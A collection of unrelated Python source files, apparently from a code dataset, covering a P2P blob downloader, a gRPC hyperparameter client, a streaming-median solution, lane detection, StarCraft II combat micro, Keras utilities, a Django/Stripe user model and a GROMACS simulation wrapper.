forgiven = [banned_peer for banned_peer, when in self.ignored.items() if now - when > self.BAN_TIME]
self.peer_queue.put_nowait(forgiven)
for banned_peer in forgiven:
self.ignored.pop(banned_peer)
async def download_blob(self, blob_hash: str, length: typing.Optional[int] = None) -> 'BlobFile':
blob = self.blob_manager.get_blob(blob_hash, length)
if blob.get_is_verified():
return blob
try:
while not blob.get_is_verified():
batch: typing.List['KademliaPeer'] = []
while not self.peer_queue.empty():
batch.extend(self.peer_queue.get_nowait())
batch.sort(key=lambda peer: self.scores.get(peer, 0), reverse=True)
log.debug(
"running, %d peers, %d ignored, %d active",
len(batch), len(self.ignored), len(self.active_connections)
)
for peer in batch:
if not self.should_race_continue(blob):
break
if peer not in self.active_connections and peer not in self.ignored:
log.debug("request %s from %s:%i", blob_hash[:8], peer.address, peer.tcp_port)
t = self.loop.create_task(self.request_blob_from_peer(blob, peer))
self.active_connections[peer] = t
await self.new_peer_or_finished(blob)
self.cleanup_active()
if batch:
self.peer_queue.put_nowait(set(batch).difference(self.ignored))
else:
self.clearbanned()
blob.close()
log.debug("downloaded %s", blob_hash[:8])
return blob
finally:
while self.active_connections:
self.active_connections.popitem()[1].cancel()
def close(self):
self.scores.clear()
self.ignored.clear()
for transport in self.connections.values():
transport.close()
async def download_blob(loop, config: 'Config', blob_manager: 'BlobFileManager', node: 'Node',
blob_hash: str) -> 'BlobFile':
search_queue = asyncio.Queue(loop=loop, maxsize=config.max_connections_per_download)
search_queue.put_nowait(blob_hash)
peer_queue, accumulate_task = node.accumulate_peers(search_queue)
downloader = BlobDownloader(loop, config, blob_manager, peer_queue)
try:
return await downloader.download_blob(blob_hash)
finally:
if accumulate_task and not accumulate_task.done():
accumulate_task.cancel()
downloader.close()
|
nilq/baby-python
|
python
|
import grpc
from pkg.api.python import api_pb2
from pkg.api.python import api_pb2_grpc
from pkg.suggestion.test_func import func
from pkg.suggestion.types import DEFAULT_PORT
def run():
channel = grpc.insecure_channel(DEFAULT_PORT)
stub = api_pb2_grpc.SuggestionStub(channel)
set_param_response = stub.SetSuggestionParameters(api_pb2.SetSuggestionParametersRequest(
study_id="1",
suggestion_parameters=[
api_pb2.SuggestionParameter(
name="N",
value="100",
),
api_pb2.SuggestionParameter(
name="kernel_type",
value="matern",
),
api_pb2.SuggestionParameter(
name="mode",
value="ei",
),
api_pb2.SuggestionParameter(
name="trade_off",
value="0.01",
),
api_pb2.SuggestionParameter(
name="model_type",
value="gp",
),
api_pb2.SuggestionParameter(
name="n_estimators",
value="50",
),
]
))
completed_trials = []
maximum = -1
iter = 0
for i in range(30):
response = stub.GenerateTrials(api_pb2.GenerateTrialsRequest(
study_id="1",
configs=api_pb2.StudyConfig(
name="test_study",
owner="me",
optimization_type=api_pb2.MAXIMIZE,
optimization_goal=0.2,
parameter_configs=api_pb2.StudyConfig.ParameterConfigs(
configs=[
# api_pb2.ParameterConfig(
# name="param1",
# parameter_type=api_pb2.INT,
# feasible=api_pb2.FeasibleSpace(max="5", min="1", list=[]),
# ),
# api_pb2.ParameterConfig(
# name="param2",
# parameter_type=api_pb2.CATEGORICAL,
# feasible=api_pb2.FeasibleSpace(max=None, min=None, list=["cat1", "cat2", "cat3"])
# ),
# api_pb2.ParameterConfig(
# name="param3",
# parameter_type=api_pb2.DISCRETE,
# feasible=api_pb2.FeasibleSpace(max=None, min=None, list=["3", "2", "6"])
# ),
# api_pb2.ParameterConfig(
# name="param4",
# parameter_type=api_pb2.DOUBLE,
# feasible=api_pb2.FeasibleSpace(max="5", min="1", list=[])
# )
api_pb2.ParameterConfig(
name="param1",
parameter_type=api_pb2.DOUBLE,
feasible=api_pb2.FeasibleSpace(max="1", min="0", list=[]),
),
api_pb2.ParameterConfig(
name="param2",
parameter_type=api_pb2.DOUBLE,
feasible=api_pb2.FeasibleSpace(max="1", min="0", list=[])
),
],
),
access_permissions=[],
suggest_algorithm="BO",
autostop_algorithm="",
study_task_name="task",
suggestion_parameters=[],
tags=[],
objective_value_name="precision",
metrics=[],
image="",
command=["", ""],
gpu=0,
scheduler="",
mount=api_pb2.MountConf(
pvc="",
path="",
),
pull_secret=""
),
completed_trials=completed_trials,
running_trials=[],)
)
x1 = response.trials[0].parameter_set[0].value
x2 = response.trials[0].parameter_set[1].value
objective_value = func(float(x1), float(x2))
if objective_value > maximum:
maximum = objective_value
iter = i
print(objective_value)
completed_trials.append(api_pb2.Trial(
trial_id=response.trials[0].trial_id,
study_id="1",
status=api_pb2.COMPLETED,
eval_logs=[],
objective_value=str(objective_value),
parameter_set=[
api_pb2.Parameter(
name="param1",
parameter_type=api_pb2.DOUBLE,
value=x1,
),
api_pb2.Parameter(
name="param2",
parameter_type=api_pb2.DOUBLE,
value=x2,
),
]
))
print(str(response.trials[0].parameter_set))
stop_study_response = stub.StopSuggestion(api_pb2.StopStudyRequest(
study_id="1"
))
print("found the maximum: {} at {} iteration".format(maximum, iter))
if __name__ == "__main__":
run()
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
# @Time: 2020/10/10 11:58
# @Author: GraceKoo
# @File: interview_63.py
# @Desc: https://leetcode-cn.com/problems/shu-ju-liu-zhong-de-zhong-wei-shu-lcof/
from heapq import *
class MedianFinder:
def __init__(self):
"""
initialize your data structure here.
"""
self.A = [] # 大顶堆,存放较小的元素
self.B = [] # 小顶堆,存放较大的元素,使得B的最小的元素也比A中最大的元素大,保证数据流保持有序
def addNum(self, num: int) -> None:
# 数据流长度为奇数时,需向A中插入元素:先向B中插入num,再将B的堆顶元素插入至A,保证B比A大
if len(self.A) != len(self.B):
heappush(self.B, num)
heappush(self.A, -heappop(self.B))
# 数据流长度为偶数时,需向B中插入元素:先向A中插入num,再将A的堆顶元素插入至B,保证B比A大
else:
heappush(self.A, -num)
heappush(self.B, -heappop(self.A))
def findMedian(self) -> float:
if len(self.A) != len(self.B):
return self.B[0]
else:
return (-self.A[0] + self.B[0]) / 2.0
# Your MedianFinder object will be instantiated and called as such:
# obj = MedianFinder()
# obj.addNum(num)
# param_2 = obj.findMedian()
|
nilq/baby-python
|
python
|
import pytest
from pytest_cases.case_parametrizer_legacy import get_pytest_marks_on_function, make_marked_parameter_value
def test_get_pytest_marks():
"""
Tests that we are able to correctly retrieve the marks on case_func
:return:
"""
skip_mark = pytest.mark.skipif(True, reason="why")
@skip_mark
def case_func():
pass
# extract the marks from a case function
marks = get_pytest_marks_on_function(case_func, as_decorators=True)
# check that the mark is the same than a manually made one
assert len(marks) == 1
assert str(marks[0]) == str(skip_mark)
# transform a parameter into a marked parameter
dummy_case = (1, 2, 3)
marked_param = make_marked_parameter_value((dummy_case,), marks=marks)
|
nilq/baby-python
|
python
|
from Game import game
class MyClass(object):
gamenew = game()
def executegame(self):
self.gamenew.gamce()
print 'test'
if __name__ == '__main__':
a = MyClass()
a.executegame()
|
nilq/baby-python
|
python
|
import numpy as np
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import pickle
from combined_thresh import combined_thresh
from perspective_transform import perspective_transform
from Line import Line
from line_fit import line_fit, tune_fit, final_viz, calc_curve, calc_vehicle_offset, viz2
from moviepy.editor import VideoFileClip
# Global variables (just to make the moviepy video annotation work)
with open('calibrate_camera.p', 'rb') as f:
save_dict = pickle.load(f)
mtx = save_dict['mtx']
dist = save_dict['dist']
window_size = 5 # how many frames for line smoothing
left_line = Line(n=window_size)
right_line = Line(n=window_size)
detected = False # did the fast line fit detect the lines?
left_curve, right_curve = 0., 0. # radius of curvature for left and right lanes
left_lane_inds, right_lane_inds = None, None # for calculating curvature
frameCount = 0
retLast = {}
# MoviePy video annotation will call this function
def annotate_image(img_in):
"""
Annotate the input image with lane line markings
Returns annotated image
"""
global mtx, dist, left_line, right_line, detected, frameCount, retLast
global left_curve, right_curve, left_lane_inds, right_lane_inds
frameCount += 1
src = np.float32(
[[200, 720],
[1100, 720],
[520, 500],
[760, 500]])
x = [src[0, 0], src[1, 0], src[3, 0], src[2, 0], src[0, 0]]
y = [src[0, 1], src[1, 1], src[3, 1], src[2, 1], src[0, 1]]
# Undistort, threshold, perspective transform
undist = cv2.undistort(img_in, mtx, dist, None, mtx)
img, abs_bin, mag_bin, dir_bin, hls_bin = combined_thresh(undist)
binary_warped, binary_unwarped, m, m_inv = perspective_transform(img)
# Perform polynomial fit
if not detected:
# Slow line fit
ret = line_fit(binary_warped)
# if detect no lanes, use last result instead.
if len(ret) == 0:
ret = retLast
left_fit = ret['left_fit']
right_fit = ret['right_fit']
nonzerox = ret['nonzerox']
nonzeroy = ret['nonzeroy']
out_img = ret['out_img']
left_lane_inds = ret['left_lane_inds']
right_lane_inds = ret['right_lane_inds']
histogram = ret['histo']
# Get moving average of line fit coefficients
left_fit = left_line.add_fit(left_fit)
right_fit = right_line.add_fit(right_fit)
# Calculate curvature
left_curve, right_curve = calc_curve(left_lane_inds, right_lane_inds, nonzerox, nonzeroy)
detected = True # slow line fit always detects the line
else: # implies detected == True
# Fast line fit
left_fit = left_line.get_fit()
right_fit = right_line.get_fit()
ret = tune_fit(binary_warped, left_fit, right_fit)
left_fit = ret['left_fit']
right_fit = ret['right_fit']
nonzerox = ret['nonzerox']
nonzeroy = ret['nonzeroy']
left_lane_inds = ret['left_lane_inds']
right_lane_inds = ret['right_lane_inds']
# Only make updates if we detected lines in current frame
if ret is not None:
left_fit = ret['left_fit']
right_fit = ret['right_fit']
nonzerox = ret['nonzerox']
nonzeroy = ret['nonzeroy']
left_lane_inds = ret['left_lane_inds']
right_lane_inds = ret['right_lane_inds']
left_fit = left_line.add_fit(left_fit)
right_fit = right_line.add_fit(right_fit)
left_curve, right_curve = calc_curve(left_lane_inds, right_lane_inds, nonzerox, nonzeroy)
else:
detected = False
vehicle_offset = calc_vehicle_offset(undist, left_fit, right_fit)
# Perform final visualization on top of original undistorted image
result = final_viz(undist, left_fit, right_fit, m_inv, left_curve, right_curve, vehicle_offset)
retLast = ret
save_viz2 = './output_images/polyfit_test%d.jpg' % (frameCount)
viz2(binary_warped, ret, save_viz2)
save_warped = './output_images/warped_test%d.jpg' % (frameCount)
plt.imshow(binary_warped, cmap='gray', vmin=0, vmax=1)
if save_warped is None:
plt.show()
else:
plt.savefig(save_warped)
plt.gcf().clear()
save_binary = './output_images/binary_test%d.jpg' % (frameCount)
plt.imshow(img, cmap='gray', vmin=0, vmax=1)
if save_binary is None:
plt.show()
else:
plt.savefig(save_binary)
plt.gcf().clear()
if frameCount > 0:
fig = plt.gcf()
fig.set_size_inches(16.5, 8.5)
plt.subplot(2, 3, 1)
plt.imshow(undist)
# plt.plot(undist)
plt.plot(x, y)
plt.title('undist')
plt.subplot(2, 3, 2)
plt.imshow(hls_bin, cmap='gray', vmin=0, vmax=1)
plt.title('hls_bin')
plt.subplot(2, 3, 3)
plt.imshow(abs_bin, cmap='gray', vmin=0, vmax=1)
plt.title('abs_bin')
plt.subplot(2, 3, 4)
plt.imshow(img, cmap='gray', vmin=0, vmax=1)
plt.title('img')
plt.subplot(2, 3, 5)
plt.imshow(out_img)
plt.title('out_img')
plt.subplot(2, 3, 6)
plt.imshow(result, cmap='gray', vmin=0, vmax=1)
plt.title('result')
save_result = 'D:/code/github_code/CarND-Advanced-Lane-Lines-P4/output_images/result-test%d.jpg' % (frameCount)
if save_result is None:
plt.show()
else:
plt.savefig(save_result)
plt.gcf().clear()
return result
def annotate_video(input_file, output_file):
""" Given input_file video, save annotated video to output_file """
video = VideoFileClip(input_file)
annotated_video = video.fl_image(annotate_image)
annotated_video.write_videofile(output_file, audio=False)
if __name__ == '__main__':
# Annotate the video
# annotate_video('challenge_video.mp4', 'challenge_video_out.mp4')
# Show example annotated image on screen for sanity check
for i in range (1, 7):
img_file = 'test_images/test%d.jpg' % (i)
img = mpimg.imread(img_file)
result = annotate_image(img)
plt.imshow(result)
save_file = 'D:/code/github_code/CarND-Advanced-Lane-Lines-P4/output_images/test%d.jpg' % (i)
if save_file is None:
plt.show()
else:
plt.savefig(save_file)
plt.gcf().clear()
|
nilq/baby-python
|
python
|
from typing import List, Dict, Optional, Union
from sharpy.combat import *
from sharpy.general.extended_power import ExtendedPower
from sharpy.interfaces import ICombatManager
from sharpy.managers.core import UnitCacheManager, PathingManager, ManagerBase
from sharpy.combat import Action
from sc2.units import Units
from sc2 import UnitTypeId
from sc2.position import Point2, Point3
from sc2.unit import Unit
import numpy as np
from sklearn.cluster import DBSCAN
ignored = {UnitTypeId.MULE, UnitTypeId.LARVA, UnitTypeId.EGG}
class GroupCombatManager(ManagerBase, ICombatManager):
rules: MicroRules
def __init__(self):
super().__init__()
self.default_rules = MicroRules()
self.default_rules.load_default_methods()
self.default_rules.load_default_micro()
self.enemy_group_distance = 7
async def start(self, knowledge: "Knowledge"):
await super().start(knowledge)
self.cache: UnitCacheManager = self.knowledge.unit_cache
self.pather: PathingManager = self.knowledge.pathing_manager
self._tags: List[int] = []
self.all_enemy_power = ExtendedPower(self.unit_values)
await self.default_rules.start(knowledge)
@property
def tags(self) -> List[int]:
return self._tags
@property
def regroup_threshold(self) -> float:
""" Percentage 0 - 1 on how many of the attacking units should actually be together when attacking"""
return self.rules.regroup_percentage
@property
def own_group_threshold(self) -> float:
"""
How much distance must be between units to consider them to be in different groups
"""
return self.rules.own_group_distance
@property
def unit_micros(self) -> Dict[UnitTypeId, MicroStep]:
return self.rules.unit_micros
@property
def generic_micro(self) -> MicroStep:
return self.rules.generic_micro
async def update(self):
self.enemy_groups: List[CombatUnits] = self.group_enemy_units()
self.all_enemy_power.clear()
for group in self.enemy_groups: # type: CombatUnits
self.all_enemy_power.add_units(group.units)
async def post_update(self):
pass
@property
def debug(self):
return self._debug and self.knowledge.debug
def add_unit(self, unit: Unit):
if unit.type_id in ignored: # Just no
return
self._tags.append(unit.tag)
def add_units(self, units: Units):
for unit in units:
self.add_unit(unit)
def get_all_units(self) -> Units:
units = Units([], self.ai)
for tag in self._tags:
unit = self.cache.by_tag(tag)
if unit:
units.append(unit)
return units
def execute(self, target: Point2, move_type=MoveType.Assault, rules: Optional[MicroRules] = None):
our_units = self.get_all_units()
if len(our_units) < 1:
return
self.rules = rules if rules else self.default_rules
self.own_groups: List[CombatUnits] = self.group_own_units(our_units)
if self.debug:
fn = lambda group: group.center.distance_to(self.ai.start_location)
sorted_list = sorted(self.own_groups, key=fn)
for i in range(0, len(sorted_list)):
sorted_list[i].debug_index = i
self.rules.handle_groups_func(self, target, move_type)
self._tags.clear()
def faster_group_should_regroup(self, group1: CombatUnits, group2: Optional[CombatUnits]) -> bool:
if not group2:
return False
if group1.average_speed < group2.average_speed + 0.1:
return False
# Our group is faster, it's a good idea to regroup
return True
def regroup(self, group: CombatUnits, target: Union[Unit, Point2]):
if isinstance(target, Unit):
target = self.pather.find_path(group.center, target.position, 1)
else:
target = self.pather.find_path(group.center, target, 3)
self.move_to(group, target, MoveType.Push)
def move_to(self, group: CombatUnits, target, move_type: MoveType):
self.action_to(group, target, move_type, False)
def attack_to(self, group: CombatUnits, target, move_type: MoveType):
self.action_to(group, target, move_type, True)
def action_to(self, group: CombatUnits, target, move_type: MoveType, is_attack: bool):
original_target = target
if isinstance(target, Point2) and group.ground_units:
if move_type in {MoveType.DefensiveRetreat, MoveType.PanicRetreat}:
target = self.pather.find_influence_ground_path(group.center, target, 14)
else:
target = self.pather.find_path(group.center, target, 14)
own_unit_cache: Dict[UnitTypeId, Units] = {}
for unit in group.units:
real_type = self.unit_values.real_type(unit.type_id)
units = own_unit_cache.get(real_type, Units([], self.ai))
if units.amount == 0:
own_unit_cache[real_type] = units
units.append(unit)
for type_id, type_units in own_unit_cache.items():
micro: MicroStep = self.unit_micros.get(type_id, self.generic_micro)
micro.init_group(self.rules, group, type_units, self.enemy_groups, move_type, original_target)
group_action = micro.group_solve_combat(type_units, Action(target, is_attack))
for unit in type_units:
final_action = micro.unit_solve_combat(unit, group_action)
final_action.to_commmand(unit)
if self.debug:
if final_action.debug_comment:
status = final_action.debug_comment
elif final_action.ability:
status = final_action.ability.name
elif final_action.is_attack:
status = "Attack"
else:
status = "Move"
if final_action.target is not None:
if isinstance(final_action.target, Unit):
status += f": {final_action.target.type_id.name}"
else:
status += f": {final_action.target}"
status += f" G: {group.debug_index}"
status += f"\n{move_type.name}"
pos3d: Point3 = unit.position3d
pos3d = Point3((pos3d.x, pos3d.y, pos3d.z + 2))
self.ai._client.debug_text_world(status, pos3d, size=10)
def closest_group(
self,
start: Point2,
combat_groups: List[CombatUnits],
group_center: Optional[Point2] = None,
distance: float = 50,
) -> Optional[CombatUnits]:
group = None
best_distance = distance # doesn't find enemy groups closer than this
if group_center is None:
group_center = start
for combat_group in combat_groups:
center = combat_group.center
if center == group_center:
continue # it's the same group!
distance = start.distance_to(center)
if distance < best_distance:
best_distance = distance
group = combat_group
return group
def group_own_units(self, units: Units) -> List[CombatUnits]:
groups: List[Units] = []
# import time
# ns_pf = time.perf_counter_ns()
numpy_vectors: List[np.ndarray] = []
for unit in units:
numpy_vectors.append(np.array([unit.position.x, unit.position.y]))
if numpy_vectors:
clustering = DBSCAN(eps=self.enemy_group_distance, min_samples=1).fit(numpy_vectors)
# print(clustering.labels_)
for index in range(0, len(clustering.labels_)):
unit = units[index]
if unit.type_id in self.unit_values.combat_ignore:
continue
label = clustering.labels_[index]
if label >= len(groups):
groups.append(Units([unit], self.ai))
else:
groups[label].append(unit)
# for label in clustering.labels_:
# ns_pf = time.perf_counter_ns() - ns_pf
# print(f"Own unit grouping (v2) took {ns_pf / 1000 / 1000} ms. groups: {len(groups)} units: {len(units)}")
return [CombatUnits(u, self.knowledge) for u in groups]
def group_enemy_units(self) -> List[CombatUnits]:
groups: List[Units] = []
import time
ns_pf = time.perf_counter_ns()
if self.cache.enemy_numpy_vectors:
clustering = DBSCAN(eps=self.enemy_group_distance, min_samples=1).fit(self.cache.enemy_numpy_vectors)
# print(clustering.labels_)
units = self.ai.all_enemy_units
for index in range(0, len(clustering.labels_)):
unit = units[index]
if unit.type_id in self.unit_values.combat_ignore or not unit.can_be_attacked:
continue
label = clustering.labels_[index]
if label >= len(groups):
groups.append(Units([unit], self.ai))
else:
groups[label].append(unit)
# for label in clustering.labels_:
ns_pf = time.perf_counter_ns() - ns_pf
# print(f"Enemy unit grouping (v2) took {ns_pf / 1000 / 1000} ms. groups: {len(groups)}")
return [CombatUnits(u, self.knowledge) for u in groups]
|
nilq/baby-python
|
python
|
names = []
while True:
name = input()
if name == '.':
break
names.append(name)
print(names)
print(len(names))
|
nilq/baby-python
|
python
|
import ctypes
import cairo
from pygame.rect import Rect
def get_rect_by_size(upper_corner, size):
return Rect(*upper_corner, size, size)
PyBUF_READ = 0x100
PyBUF_WRITE = 0x200
def get_cairo_surface(pygame_surface):
""" Black magic. """
class Surface(ctypes.Structure):
_fields_ = [
(
'HEAD', ctypes.c_byte * object.__basicsize__),
(
'SDL_Surface', ctypes.c_void_p)]
class SDL_Surface(ctypes.Structure):
_fields_ = [
(
'flags', ctypes.c_uint),
(
'SDL_PixelFormat', ctypes.c_void_p),
(
'w', ctypes.c_int),
(
'h', ctypes.c_int),
(
'pitch', ctypes.c_ushort),
(
'pixels', ctypes.c_void_p)]
surface = Surface.from_address(id(pygame_surface))
ss = SDL_Surface.from_address(surface.SDL_Surface)
pixels_ptr = ctypes.pythonapi.PyMemoryView_FromMemory(ctypes.c_void_p(ss.pixels),
ss.pitch * ss.h,
PyBUF_WRITE)
pixels = ctypes.cast(pixels_ptr, ctypes.py_object).value
return cairo.ImageSurface.create_for_data(pixels, cairo.FORMAT_RGB24, ss.w, ss.h, ss.pitch)
|
nilq/baby-python
|
python
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions shared between SavedModel saving/loading implementations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.util import tf_inspect
def use_wrapped_call(layer, call_fn):
"""Creates fn that adds the losses returned by call_fn & returns the outputs.
Args:
layer: A Keras layer object
call_fn: tf.function that takes layer inputs (and possibly a training arg),
and returns a tuple of (outputs, list of losses).
Returns:
function that calls call_fn and returns the outputs. Losses returned by
call_fn are added to the layer losses.
"""
training_arg_index = get_training_arg_index(layer)
def wrapped_call(inputs, *args, **kwargs):
"""Returns the outputs from the call_fn, and adds the losses."""
if layer._expects_training_arg: # pylint: disable=protected-access
training = get_training_arg(training_arg_index, args, kwargs)
if training is None:
training = K.learning_phase()
args = list(args)
kwargs = kwargs.copy()
def replace_training_and_call(training):
new_args, new_kwargs = set_training_arg(training, training_arg_index,
args, kwargs)
return call_fn(inputs, *new_args, **new_kwargs)
outputs, losses = tf_utils.smart_cond(
training,
lambda: replace_training_and_call(True),
lambda: replace_training_and_call(False))
else:
outputs, losses = call_fn(inputs)
layer.add_loss(losses, inputs)
return outputs
return wrapped_call
def get_training_arg_index(layer):
"""Returns the index of 'training' in the layer call function arguments.
Args:
layer: Keras layer
Returns:
- n: index of 'training' in the call function arguments.
- -1: if 'training' is not found in the arguments, but layer.call accepts
variable keyword arguments
- None: if layer doesn't expect a training argument.
"""
if not layer._expects_training_arg: # pylint: disable=protected-access
return None
arg_list = tf_inspect.getfullargspec(layer.call).args
if tf_inspect.ismethod(layer.call):
arg_list = arg_list[1:]
if 'training' in arg_list:
return arg_list.index('training')
else:
return -1
def set_training_arg(training, index, args, kwargs):
if index is None:
pass
elif index >= 0 and len(args) > index:
args[index] = training
else:
kwargs['training'] = training
return args, kwargs
def get_training_arg(index, args, kwargs):
if index is None:
return None
elif index >= 0 and len(args) > index:
return args[index]
else:
return kwargs.get('training', None)
|
nilq/baby-python
|
python
|
from django.conf import settings
from django.contrib.auth.models import AbstractUser
from django.db.models import CharField
from django.db.models.signals import post_save
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from django.core.mail import EmailMultiAlternatives
from django.dispatch import receiver
from django.template.loader import render_to_string
from django_rest_passwordreset.signals import reset_password_token_created
import stripe
stripe.api_key = settings.STRIPE_SECRET_KEY
class User(AbstractUser):
"""
Default custom user model for mentors.
If adding fields that need to be filled at user signup,
check forms.SignupForm and forms.SocialSignupForms accordingly.
"""
#: First and last name do not cover name patterns around the globe
name = CharField(_("Name of User"), blank=True, max_length=255)
stripe_account_id = CharField(max_length=100)
stripe_customer_id = CharField(max_length=100)
def get_absolute_url(self):
"""Get url for user's detail view.
Returns:
str: URL for user detail.
"""
return reverse("users:detail", kwargs={"username": self.username})
def post_save_user_receiver(sender, instance, created, **kwargs):
if created:
instance.name = f"{instance.first_name} {instance.last_name}"
account = stripe.Account.create(
type='express',
)
instance.stripe_account_id = account["id"]
customer = stripe.Customer.create(
email=instance.email,
name=instance.name
)
instance.stripe_customer_id = customer["id"]
instance.save()
# Avoid circular import
from mentors.mentors.models import Mentor
Mentor.objects.create(user=instance)
post_save.connect(post_save_user_receiver, sender=User)
@receiver(reset_password_token_created)
def password_reset_token_created(sender, instance, reset_password_token, *args, **kwargs):
"""
Handles password reset tokens
When a token is created, an e-mail needs to be sent to the user
:param sender: View Class that sent the signal
:param instance: View Instance that sent the signal
:param reset_password_token: Token Model Object
:param args:
:param kwargs:
:return:
"""
# send an e-mail to the user
domain = "https://domain.com"
if settings.DEBUG:
domain = "http://localhost:3000"
reset_password_url = domain + '/accounts/reset-password/confirm/' + reset_password_token.key
context = {
'current_user': reset_password_token.user,
'username': reset_password_token.user.username,
'email': reset_password_token.user.email,
'reset_password_url': reset_password_url,
'domain': domain
}
# render email text
email_html_message = render_to_string('email/user_reset_password.html', context)
email_plaintext_message = render_to_string('email/user_reset_password.txt', context)
msg = EmailMultiAlternatives(
# title:
"Password Reset for {title}".format(title="Mentors"),
# message:
email_plaintext_message,
# from:
"noreply@somehost.local",
# to:
[reset_password_token.user.email]
)
msg.attach_alternative(email_html_message, "text/html")
msg.send()
|
nilq/baby-python
|
python
|
import numpy as np
class Neurons:
def __init__(self, n_inputs, n_neurons):
self.weights = 1 * np.random.randn(n_inputs, n_neurons)
self.biases = np.zeros((1, n_neurons))
|
nilq/baby-python
|
python
|
import abc
import glob
import logging
import os
import subprocess as sp
from collections import OrderedDict
from enum import Enum
from paprika.utils import get_dict_without_keys
from .simulation import Simulation
logger = logging.getLogger(__name__)
class GROMACS(Simulation, abc.ABC):
"""
A wrapper that can be used to set GROMACS simulation parameters.
.. todo ::
possibly modify this module to use the official python wrapper of GROMACS.
Below is an example of the configuration file (``gromacs.mdp``) generated by the wrapper. The class property
associated with defining the configuration variables is shown in brackets.
.. code ::
title = NPT MD Simulation ; [self.title]
; Run control [self.control]
nsteps = 1500000
nstxout = 500
nstlog = 500
nstenergy = 500
nstcalcenergy = 500
dt = 0.002
integrator = md
; Nonbonded options [self.nb_method]
cutoff-scheme = Verlet
ns_type = grid
nstlist = 10
rlist = 0.9
rcoulomb = 0.9
rvdw = 0.9
coulombtype = PME
pme_order = 4
fourierspacing = 0.16
vdwtype = Cut-off
DispCorr = EnerPres
pbc = xyz
; Bond constraints [self.constraints]
constraint-algorithm = lincs
constraints = h-bonds
lincs_iter = 1
lincs_order = 4
; Temperature coupling [self.thermostat]
tcoupl = v-rescale
tc-grps = System
ref_t = 298.15
tau_t = 0.1
gen_vel = no
; Pressure coupling [self.barostat]
pcoupl = Berendsen
pcoupltype = isotropic
tau_p = 2.0
ref_p = 1.01325
compressibility = 4.5e-05
"""
class Thermostat(Enum):
"""
An enumeration of the different themostat implemented in GROMACS.
"""
Off = "no"
Berendsen = "berendsen"
NoseHoover = "nose-hoover"
Andersen1 = "andersen"
Andersen2 = "andersen-massive"
VelocityRescaling = "v-rescale"
class Barostat(Enum):
"""
An enumeration of the different barostat implemented in GROMACS.
"""
Off = "no"
Berendsen = "Berendsen"
ParrinelloRahman = "Parrinello-Rahman"
MMTK = "MTTK"
class Integrator(Enum):
"""
An enumeration of the different integrators implemented in GROMACS.
"""
LeapFrog = "md"
VelocityVerlet = "md-vv"
VelocityVerletAveK = "md-vv-avek"
LangevinDynamics = "sd"
BrownianDynamics = "bd"
class Optimizer(Enum):
"""
An enumeration of the different minimization algorithm implemented in GROMACS.
"""
SteepestDescent = "steep"
ConjugateGradient = "cg"
Broyden = "l-bfgs"
class BoxScaling(Enum):
"""
An enumeration of the different PBC scaling options when running constant pressure simulations in GROMACS.
"""
Isotropic = "isotropic"
Semiisotropic = "semiisotropic"
Anisotropic = "anisotropic"
SurfaceTension = "surface-tension"
class Constraints(Enum):
"""
An enumeration of the different bond constraint options in GROMACS.
"""
Off = "none"
HBonds = "h-bonds"
AllBonds = "all-bonds"
HAngles = "h-angles"
AllAngles = "all-angles"
@property
def index_file(self) -> str:
"""os.PathLike: GROMACS index file that specifies ``groups`` in the system. This is optional in a GROMACS
simulation."""
return self._index_file
@index_file.setter
def index_file(self, value: str):
self._index_file = value
@property
def checkpoint(self) -> str:
"""os.PathLike: Checkpoint file (extension is ``.cpt``) for starting a simulation from a previous state."""
return self._checkpoint
@checkpoint.setter
def checkpoint(self, value: str):
self._checkpoint = value
@property
def control(self):
"""dict: Dictionary for the output control of the MD simulation (frequency of energy, trajectory etc)."""
return self._control
@control.setter
def control(self, value):
self._control = value
@property
def nb_method(self):
"""dict: Dictionary for the non-bonded method options (cutoffs and methods)."""
return self._nb_method
@nb_method.setter
def nb_method(self, value):
self._nb_method = value
@property
def constraints(self):
"""dict: Dictionary for the bond constraint options (LINCS or SHAKE)."""
return self._constraints
@constraints.setter
def constraints(self, value):
self._constraints = value
@property
def tc_groups(self) -> list:
"""
list: List of groups to apply thermostat "separately" based on the groups defined in the ``index_file``.
Below is an example of applying the thermostat for different groups separately in a GROMACS input file
.. code ::
tcoupl = v-rescale
tc-grps = HOST GUEST HOH
tau-t = 0.1 0.1 0.1
ref-t = 300 300 300
"""
return self._tc_groups
@tc_groups.setter
def tc_groups(self, value: list):
self._tc_groups = value
@property
def prefix(self):
"""str: The prefix for file names generated from this simulation."""
return self._prefix
@prefix.setter
def prefix(self, new_prefix):
self._prefix = new_prefix
self.input = new_prefix + ".mdp"
self.output = new_prefix + ".mdout"
self.logfile = new_prefix + ".log"
self.tpr = new_prefix + ".tpr"
@property
def custom_mdrun_command(self) -> str:
"""Custom commands for ``mdrun``. The default commands parsed to ``mdrun`` if all the variables are defined is
.. code::
gmx mdrun -deffnm ``prefix`` -nt ``n_threads`` -gpu_id ``gpu_devices`` -plumed ``plumed.dat``
This is useful depending on how GROMACS was compiled, e.g. if GROMACS is compiled with the MPI library the
you will need to use the command below:
.. code::
mpirun -np 6 gmx_mpi mdrun -deffnm ``prefix`` -ntomp 1 -gpu_id 0 -plumed ``plumed.dat``
"""
return self._custom_mdrun_command
@custom_mdrun_command.setter
def custom_mdrun_command(self, value: str):
self._custom_mdrun_command = value
@property
def grompp_maxwarn(self) -> int:
"""int: Maximum number of warnings for GROMPP to ignore. default=1."""
return self._grompp_maxwarn
@grompp_maxwarn.setter
def grompp_maxwarn(self, value: int):
self._grompp_maxwarn = value
def __init__(self):
super().__init__()
# I/O
self._index_file = None
self._custom_mdrun_command = None
self._tc_groups = None
self._grompp_maxwarn = 1
# File names
self.input = self._prefix + ".mdp"
self.output = self._prefix + ".mdout"
self._checkpoint = None
self.logfile = self._prefix + ".log"
self.tpr = self._prefix + ".tpr"
# Input file
self._control = OrderedDict()
